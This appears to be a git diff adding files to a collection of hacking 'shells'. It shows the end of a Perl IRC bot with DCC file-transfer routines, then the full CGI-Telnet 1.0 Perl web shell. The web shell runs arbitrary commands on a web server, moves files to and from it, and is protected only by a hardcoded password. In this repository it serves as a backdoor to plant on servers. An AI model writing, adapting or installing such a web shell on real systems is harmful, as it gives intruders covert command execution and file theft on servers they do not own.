||||
sendraw("MODE $_[0] +v $_[1]");
|
||||
}
|
||||
sub devoice {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -v $_[1]");
|
||||
}
|
||||
sub ban {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +b $_[1]");
|
||||
}
|
||||
sub unban {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -b $_[1]");
|
||||
}
|
||||
sub kick {
|
||||
return unless $#_ == 1;
|
||||
sendraw("KICK $_[0] $_[1] :$_[2]");
|
||||
}
|
||||
|
||||
sub modo {
|
||||
return unless $#_ == 0;
|
||||
sendraw("MODE $_[0] $_[1]");
|
||||
}
|
||||
sub mode { modo(@_); }
|
||||
|
||||
sub j { &join(@_); }
|
||||
sub join {
|
||||
return unless $#_ == 0;
|
||||
sendraw("JOIN $_[0]");
|
||||
}
|
||||
sub p { part(@_); }
|
||||
sub part {sendraw("PART $_[0]");}
|
||||
|
||||
sub nick {
|
||||
return unless $#_ == 0;
|
||||
sendraw("NICK $_[0]");
|
||||
}
|
||||
|
||||
sub invite {
|
||||
return unless $#_ == 1;
|
||||
sendraw("INVITE $_[1] $_[0]");
|
||||
}
|
||||
sub topico {
|
||||
return unless $#_ == 1;
|
||||
sendraw("TOPIC $_[0] $_[1]");
|
||||
}
|
||||
sub topic { topico(@_); }
|
||||
|
||||
sub whois {
|
||||
return unless $#_ == 0;
|
||||
sendraw("WHOIS $_[0]");
|
||||
}
|
||||
sub who {
|
||||
return unless $#_ == 0;
|
||||
sendraw("WHO $_[0]");
|
||||
}
|
||||
sub names {
|
||||
return unless $#_ == 0;
|
||||
sendraw("NAMES $_[0]");
|
||||
}
|
||||
sub away {
|
||||
sendraw("AWAY $_[0]");
|
||||
}
|
||||
sub back { away(); }
|
||||
sub quit {
|
||||
sendraw("QUIT :$_[0]");
|
||||
}
|
||||
|
||||
|
||||
|
||||
# DCC
|
||||
package DCC;
|
||||
|
||||
sub connections {
|
||||
my @ready = $dcc_sel->can_read(1);
|
||||
# return unless (@ready);
|
||||
foreach my $fh (@ready) {
|
||||
my $dcctipo = $DCC{$fh}{tipo};
|
||||
my $arquivo = $DCC{$fh}{arquivo};
|
||||
my $bytes = $DCC{$fh}{bytes};
|
||||
my $cur_byte = $DCC{$fh}{curbyte};
|
||||
my $nick = $DCC{$fh}{nick};
|
||||
|
||||
my $msg;
|
||||
my $nread = sysread($fh, $msg, 10240);
|
||||
|
||||
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
|
||||
$DCC{$fh}{status} = "Cancelado";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
$dcc_sel->remove($fh);
|
||||
$fh->close;
|
||||
next;
|
||||
}
|
||||
|
||||
if ($dcctipo eq "get") {
|
||||
$DCC{$fh}{curbyte} += length($msg);
|
||||
|
||||
my $cur_byte = $DCC{$fh}{curbyte};
|
||||
|
||||
open(FILE, ">> $arquivo");
|
||||
print FILE "$msg" if ($cur_byte <= $bytes);
|
||||
close(FILE);
|
||||
|
||||
my $packbyte = pack("N", $cur_byte);
|
||||
print $fh "$packbyte";
|
||||
|
||||
if ($bytes == $cur_byte) {
|
||||
$dcc_sel->remove($fh);
|
||||
$fh->close;
|
||||
$DCC{$fh}{status} = "Recebido";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
next;
|
||||
}
|
||||
} elsif ($dcctipo eq "send") {
|
||||
my $send = $fh->accept;
|
||||
$send->autoflush(1);
|
||||
$dcc_sel->add($send);
|
||||
$dcc_sel->remove($fh);
|
||||
$DCC{$send}{tipo} = 'sendcon';
|
||||
$DCC{$send}{itime} = time;
|
||||
$DCC{$send}{nick} = $nick;
|
||||
$DCC{$send}{bytes} = $bytes;
|
||||
$DCC{$send}{curbyte} = 0;
|
||||
$DCC{$send}{arquivo} = $arquivo;
|
||||
$DCC{$send}{ip} = $send->peerhost;
|
||||
$DCC{$send}{porta} = $send->peerport;
|
||||
$DCC{$send}{status} = "Enviando";
|
||||
|
||||
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
|
||||
open(FILE, "< $arquivo");
|
||||
my $fbytes;
|
||||
read(FILE, $fbytes, 1024);
|
||||
print $send "$fbytes";
|
||||
close FILE;
|
||||
# delete($DCC{$fh});
|
||||
} elsif ($dcctipo eq 'sendcon') {
|
||||
my $bytes_sended = unpack("N", $msg);
|
||||
$DCC{$fh}{curbyte} = $bytes_sended;
|
||||
if ($bytes_sended == $bytes) {
|
||||
$fh->close;
|
||||
$dcc_sel->remove($fh);
|
||||
$DCC{$fh}{status} = "Enviado";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
next;
|
||||
}
|
||||
open(SENDFILE, "< $arquivo");
|
||||
seek(SENDFILE, $bytes_sended, 0);
|
||||
my $send_bytes;
|
||||
read(SENDFILE, $send_bytes, 1024);
|
||||
print $fh "$send_bytes";
|
||||
close(SENDFILE);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
sub SEND {
|
||||
my ($nick, $arquivo) = @_;
|
||||
unless (-r "$arquivo") {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my $dccark = $arquivo;
|
||||
$dccark =~ s/[.*\/](\S+)/$1/;
|
||||
|
||||
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
|
||||
my $longip = unpack("N",inet_aton($meuip));
|
||||
|
||||
my @filestat = stat($arquivo);
|
||||
my $size_total=$filestat[7];
|
||||
if ($size_total == 0) {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my ($porta, $sendsock);
|
||||
do {
|
||||
$porta = int rand(64511);
|
||||
$porta += 1024;
|
||||
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
|
||||
} until $sendsock;
|
||||
|
||||
$DCC{$sendsock}{tipo} = 'send';
|
||||
$DCC{$sendsock}{nick} = $nick;
|
||||
$DCC{$sendsock}{bytes} = $size_total;
|
||||
$DCC{$sendsock}{arquivo} = $arquivo;
|
||||
|
||||
|
||||
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
|
||||
|
||||
}
|
||||
|
||||
sub GET {
|
||||
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
|
||||
return(0) if (-e "$arquivo");
|
||||
if (open(FILE, "> $arquivo")) {
|
||||
close FILE;
|
||||
} else {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my $dccip=fixaddr($dcclongip);
|
||||
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
|
||||
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
|
||||
$dccsock->autoflush(1);
|
||||
$dcc_sel->add($dccsock);
|
||||
$DCC{$dccsock}{tipo} = 'get';
|
||||
$DCC{$dccsock}{itime} = time;
|
||||
$DCC{$dccsock}{nick} = $nick;
|
||||
$DCC{$dccsock}{bytes} = $bytes;
|
||||
$DCC{$dccsock}{curbyte} = 0;
|
||||
$DCC{$dccsock}{arquivo} = $arquivo;
|
||||
$DCC{$dccsock}{ip} = $dccip;
|
||||
$DCC{$dccsock}{porta} = $dccporta;
|
||||
$DCC{$dccsock}{status} = "Recebendo";
|
||||
}
|
||||
|
||||
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
|
||||
sub Status {
|
||||
my $socket = shift;
|
||||
my $sock_tipo = $DCC{$socket}{tipo};
|
||||
unless (lc($sock_tipo) eq "chat") {
|
||||
my $nick = $DCC{$socket}{nick};
|
||||
my $arquivo = $DCC{$socket}{arquivo};
|
||||
my $itime = $DCC{$socket}{itime};
|
||||
my $ftime = time;
|
||||
my $status = $DCC{$socket}{status};
|
||||
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
|
||||
|
||||
my $d_time = $ftime-$itime;
|
||||
|
||||
my $cur_byte = $DCC{$socket}{curbyte};
|
||||
my $bytes_total = $DCC{$socket}{bytes};
|
||||
|
||||
my $rate = 0;
|
||||
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
|
||||
my $porcen = ($cur_byte*100)/$bytes_total;
|
||||
|
||||
my ($r_duv, $p_duv);
|
||||
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
|
||||
$r_duv = $3; $r_duv++ if $4 >= 5;
|
||||
$rate = "$1\.$2"."$r_duv";
|
||||
}
|
||||
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
|
||||
$p_duv = $3; $p_duv++ if $4 >= 5;
|
||||
$porcen = "$1\.$2"."$p_duv";
|
||||
}
|
||||
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
|
||||
}
|
||||
|
||||
|
||||
return(0);
|
||||
}
|
||||
|
||||
|
||||
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
|
||||
sub fixaddr {
|
||||
my ($address) = @_;
|
||||
|
||||
chomp $address; # just in case, sigh.
|
||||
if ($address =~ /^\d+$/) {
|
||||
return inet_ntoa(pack "N", $address);
|
||||
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
|
||||
return $address;
|
||||
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
|
||||
return inet_ntoa(((gethostbyname($address))[4])[0]);
|
||||
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
|
||||
return inet_ntoa(((gethostbyname($address))[4])[0]);
|
||||
} else {
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
by Danilo
|
||||
|
||||
|
||||
|
||||
|
692
xakep-shells/PERL/telnet.pl.txt
Normal file
692
xakep-shells/PERL/telnet.pl.txt
Normal file
|
@ -0,0 +1,692 @@
|
|||
#!/usr/bin/perl
|
||||
#------------------------------------------------------------------------------
|
||||
# Copyright and Licence
|
||||
#------------------------------------------------------------------------------
|
||||
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
|
||||
#
|
||||
# Copyright (C) 2001 Rohitab Batra
|
||||
# Permission is granted to use, distribute and modify this script so long
|
||||
# as this copyright notice is left intact. If you make changes to the script
|
||||
# please document them and inform me. If you would like any changes to be made
|
||||
# in this script, you can e-mail me.
|
||||
#
|
||||
# Author: Rohitab Batra
|
||||
# Author e-mail: rohitab@rohitab.com
|
||||
# Author Homepage: http://www.rohitab.com/
|
||||
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
|
||||
# Product Support: http://www.rohitab.com/support/
|
||||
# Discussion Forum: http://www.rohitab.com/discuss/
|
||||
# Mailing List: http://www.rohitab.com/mlist/
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Installation
|
||||
#------------------------------------------------------------------------------
|
||||
# To install this script
|
||||
#
|
||||
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
|
||||
# your server. For most servers, you may not need to modify this.
|
||||
# 2. Change the password in the Configuration section below.
|
||||
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
|
||||
# Configuration Section below.
|
||||
# 4. Upload the script to a directory on your server which has permissions to
|
||||
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
|
||||
# the script in ASCII mode.
|
||||
# 5. Change the permission (CHMOD) of the script to 755.
|
||||
# 6. Open the script in your web browser. If you uploaded the script in
|
||||
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
|
||||
# 7. Login using the password that you specified in Step 2.
|
||||
#------------------------------------------------------------------------------
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Configuration: You need to change only $Password and $WinNT. The other
|
||||
# values should work fine for most systems.
|
||||
#------------------------------------------------------------------------------
|
||||
$Password = "1236987navaro"; # Change this. You will need to enter this
|
||||
# to login.
|
||||
|
||||
$WinNT = 0; # You need to change the value of this to 1 if
|
||||
# you're running this script on a Windows NT
|
||||
# machine. If you're running it on Unix, you
|
||||
# can leave the value as it is.
|
||||
|
||||
$NTCmdSep = "&"; # This character is used to seperate 2 commands
|
||||
# in a command line on Windows NT.
|
||||
|
||||
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
|
||||
# in a command line on Unix.
|
||||
|
||||
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
|
||||
# Don't set this to a very large value. This is
|
||||
# useful for commands that may hang or that
|
||||
# take very long to execute, like "find /".
|
||||
# This is valid only on Unix servers. It is
|
||||
# ignored on NT Servers.
|
||||
|
||||
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
|
||||
# browser as soon as it is output, otherwise
|
||||
# it is buffered and send when the command
|
||||
# completes. This is useful for commands like
|
||||
# ping, so that you can see the output as it
|
||||
# is being generated.
|
||||
|
||||
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
|
||||
|
||||
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
|
||||
$CmdPwd = ($WinNT ? "cd" : "pwd");
|
||||
$PathSep = ($WinNT ? "\\" : "/");
|
||||
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Reads the input sent by the browser and parses the input variables. It
|
||||
# parses GET, POST and multipart/form-data that is used for uploading files.
|
||||
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
|
||||
# Other variables can be accessed using $in{'var'}, where var is the name of
|
||||
# the variable. Note: Most of the code in this function is taken from other CGI
|
||||
# scripts.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ReadParse
|
||||
{
|
||||
local (*in) = @_ if @_;
|
||||
local ($i, $loc, $key, $val);
|
||||
|
||||
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
|
||||
|
||||
if($ENV{'REQUEST_METHOD'} eq "GET")
|
||||
{
|
||||
$in = $ENV{'QUERY_STRING'};
|
||||
}
|
||||
elsif($ENV{'REQUEST_METHOD'} eq "POST")
|
||||
{
|
||||
binmode(STDIN) if $MultipartFormData & $WinNT;
|
||||
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
|
||||
}
|
||||
|
||||
# handle file upload data
|
||||
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
|
||||
{
|
||||
$Boundary = '--'.$1; # please refer to RFC1867
|
||||
@list = split(/$Boundary/, $in);
|
||||
$HeaderBody = $list[1];
|
||||
$HeaderBody =~ /\r\n\r\n|\n\n/;
|
||||
$Header = $`;
|
||||
$Body = $';
|
||||
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
|
||||
$in{'filedata'} = $Body;
|
||||
$Header =~ /filename=\"(.+)\"/;
|
||||
$in{'f'} = $1;
|
||||
$in{'f'} =~ s/\"//g;
|
||||
$in{'f'} =~ s/\s//g;
|
||||
|
||||
# parse trailer
|
||||
for($i=2; $list[$i]; $i++)
|
||||
{
|
||||
$list[$i] =~ s/^.+name=$//;
|
||||
$list[$i] =~ /\"(\w+)\"/;
|
||||
$key = $1;
|
||||
$val = $';
|
||||
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} = $val;
|
||||
}
|
||||
}
|
||||
else # standard post data (url encoded, not multipart)
|
||||
{
|
||||
@in = split(/&/, $in);
|
||||
foreach $i (0 .. $#in)
|
||||
{
|
||||
$in[$i] =~ s/\+/ /g;
|
||||
($key, $val) = split(/=/, $in[$i], 2);
|
||||
$key =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$val =~ s/%(..)/pack("c", hex($1))/ge;
|
||||
$in{$key} .= "\0" if (defined($in{$key}));
|
||||
$in{$key} .= $val;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML Page Header
|
||||
# Argument 1: Form item name to which focus should be set
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageHeader
|
||||
{
|
||||
$EncodedCurrentDir = $CurrentDir;
|
||||
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
print "Content-type: text/html\n\n";
|
||||
print <<END;
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<title>CGI-Telnet Version 1.0</title>
|
||||
$HtmlMetaHeader
|
||||
</head>
|
||||
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
|
||||
<table border="1" width="100%" cellspacing="0" cellpadding="2">
|
||||
<tr>
|
||||
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
|
||||
<b><font color="#000080" size="2">#</font></b></td>
|
||||
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
|
||||
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
|
||||
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
|
||||
<a href="$ScriptLocation?a=logout">Disconnect</a> |
|
||||
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
<font color="#C0C0C0" size="3">
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the Login Screen
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginScreen
|
||||
{
|
||||
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
|
||||
/ __ \| __ \|_ _| |_ _| | | | |
|
||||
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
|
||||
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
|
||||
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
|
||||
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
|
||||
|
||||
</font><font color="#FF0000"> ______ </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
|
||||
.-" "-.
|
||||
/ \
|
||||
| |
|
||||
|, .-. .-. ,|
|
||||
| )(_o/ \o_)( |
|
||||
|/ /\ \|
|
||||
(@_ (_ ^^ _)
|
||||
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
|
||||
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080"><________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________></font><font color="#FF0000">
|
||||
)_/ \ /
|
||||
(@ `--------`
|
||||
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
|
||||
$;
|
||||
#'
|
||||
print <<END;
|
||||
<code>
|
||||
Trying $ServerName...<br>
|
||||
Connected to $ServerName<br>
|
||||
Escape character is ^]
|
||||
<code>$Message
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the message that informs the user of a failed login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginFailedMessage
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<br>login: admin<br>
|
||||
password:<br>
|
||||
Login incorrect<br><br>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form for logging in
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLoginForm
|
||||
{
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="login">
|
||||
login: admin<br>
|
||||
password:<input type="password" name="p">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the footer for the HTML Page
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintPageFooter
|
||||
{
|
||||
print "</font></body></html>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Retreives the values of all cookies. The cookies can be accesses using the
|
||||
# variable $Cookies{''}
|
||||
#------------------------------------------------------------------------------
|
||||
sub GetCookies
|
||||
{
|
||||
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
|
||||
foreach $cookie(@httpcookies)
|
||||
{
|
||||
($id, $val) = split(/=/, $cookie);
|
||||
$Cookies{$id} = $val;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the screen when the user logs out
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintLogoutScreen
|
||||
{
|
||||
print "<code>Connection closed by foreign host.<br><br></code>";
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Logs out the user and allows the user to login again
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogout
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
|
||||
&PrintPageHeader("p");
|
||||
&PrintLogoutScreen;
|
||||
&PrintLoginScreen;
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to login the user. If the password matches, it
|
||||
# displays a page that allows the user to run commands. If the password doens't
|
||||
# match or if no password is entered, it displays a form that allows the user
|
||||
# to login
|
||||
#------------------------------------------------------------------------------
|
||||
sub PerformLogin
|
||||
{
|
||||
if($LoginPassword eq $Password) # password matched
|
||||
{
|
||||
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
|
||||
&PrintPageHeader("c");
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # password didn't match
|
||||
{
|
||||
&PrintPageHeader("p");
|
||||
&PrintLoginScreen;
|
||||
if($LoginPassword ne "") # some password was entered
|
||||
{
|
||||
&PrintLoginFailedMessage;
|
||||
}
|
||||
&PrintLoginForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to enter commands
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintCommandLineInputForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="a" value="command">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
$Prompt
|
||||
<input type="text" name="c">
|
||||
<input type="submit" value="Enter">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to download files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileDownloadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" method="POST" action="$ScriptLocation">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="download">
|
||||
$Prompt download<br><br>
|
||||
Filename: <input type="text" name="f" size="35"><br><br>
|
||||
Download: <input type="submit" value="Begin">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Prints the HTML form that allows the user to upload files
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintFileUploadForm
|
||||
{
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print <<END;
|
||||
<code>
|
||||
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
|
||||
$Prompt upload<br><br>
|
||||
Filename: <input type="file" name="f" size="35"><br><br>
|
||||
Options: <input type="checkbox" name="o" value="overwrite">
|
||||
Overwrite if it Exists<br><br>
|
||||
Upload: <input type="submit" value="Begin">
|
||||
<input type="hidden" name="d" value="$CurrentDir">
|
||||
<input type="hidden" name="a" value="upload">
|
||||
</form>
|
||||
</code>
|
||||
END
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the timeout for a command expires. We need to
|
||||
# terminate the script immediately. This function is valid only on Unix. It is
|
||||
# never called when the script is running on NT.
|
||||
#------------------------------------------------------------------------------
|
||||
sub CommandTimeout
|
||||
{
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
print <<END;
|
||||
</xmp>
|
||||
<code>
|
||||
Command exceeded maximum time of $CommandTimeoutDuration second(s).
|
||||
<br>Killed it!
|
||||
<code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
exit;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called to execute commands. It displays the output of the
|
||||
# command and allows the user to enter another command. The change directory
|
||||
# command is handled differently. In this case, the new directory is stored in
|
||||
# an internal variable and is used each time a command has to be executed. The
|
||||
# output of the change directory command is not displayed to the users
|
||||
# therefore error messages cannot be displayed.
|
||||
#------------------------------------------------------------------------------
|
||||
sub ExecuteCommand
|
||||
{
|
||||
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
|
||||
{
|
||||
# we change the directory internally. The output of the
|
||||
# command is not displayed.
|
||||
|
||||
$OldDir = $CurrentDir;
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
|
||||
chop($CurrentDir = `$Command`);
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code>";
|
||||
}
|
||||
else # some other command, display the output
|
||||
{
|
||||
&PrintPageHeader("c");
|
||||
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
|
||||
print "<code>$Prompt $RunCommand</code><xmp>";
|
||||
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
|
||||
if(!$WinNT)
|
||||
{
|
||||
$SIG{'ALRM'} = \&CommandTimeout;
|
||||
alarm($CommandTimeoutDuration);
|
||||
}
|
||||
if($ShowDynamicOutput) # show output as it is generated
|
||||
{
|
||||
$|=1;
|
||||
$Command .= " |";
|
||||
open(CommandOutput, $Command);
|
||||
while(<CommandOutput>)
|
||||
{
|
||||
$_ =~ s/(\n|\r\n)$//;
|
||||
print "$_\n";
|
||||
}
|
||||
$|=0;
|
||||
}
|
||||
else # show output after command completes
|
||||
{
|
||||
print `$Command`;
|
||||
}
|
||||
if(!$WinNT)
|
||||
{
|
||||
alarm(0);
|
||||
}
|
||||
print "</xmp>";
|
||||
}
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function displays the page that contains a link which allows the user
|
||||
# to download the specified file. The page also contains a auto-refresh
|
||||
# feature that starts the download automatically.
|
||||
# Argument 1: Fully qualified filename of the file to be downloaded
|
||||
#------------------------------------------------------------------------------
|
||||
sub PrintDownloadLinkPage
|
||||
{
|
||||
local($FileUrl) = @_;
|
||||
if(-e $FileUrl) # if the file exists
|
||||
{
|
||||
# encode the file link so we can send it to the browser
|
||||
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
|
||||
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
|
||||
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
|
||||
&PrintPageHeader("c");
|
||||
print <<END;
|
||||
<code>
|
||||
Sending File $TransferFile...<br>
|
||||
If the download does not start automatically,
|
||||
<a href="$DownloadLink">Click Here</a>.
|
||||
</code>
|
||||
END
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
else # file doesn't exist
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
print "<code>Failed to download $FileUrl: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function reads the specified file from the disk and sends it to the
|
||||
# browser, so that it can be downloaded by the user.
|
||||
# Argument 1: Fully qualified pathname of the file to be sent.
|
||||
#------------------------------------------------------------------------------
|
||||
sub SendFileToBrowser
|
||||
{
|
||||
local($SendFile) = @_;
|
||||
if(open(SENDFILE, $SendFile)) # file opened for reading
|
||||
{
|
||||
if($WinNT)
|
||||
{
|
||||
binmode(SENDFILE);
|
||||
binmode(STDOUT);
|
||||
}
|
||||
$FileSize = (stat($SendFile))[7];
|
||||
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
|
||||
print "Content-Type: application/x-unknown\n";
|
||||
print "Content-Length: $FileSize\n";
|
||||
print "Content-Disposition: attachment; filename=$1\n\n";
|
||||
print while(<SENDFILE>);
|
||||
close(SENDFILE);
|
||||
}
|
||||
else # failed to open file
|
||||
{
|
||||
&PrintPageHeader("f");
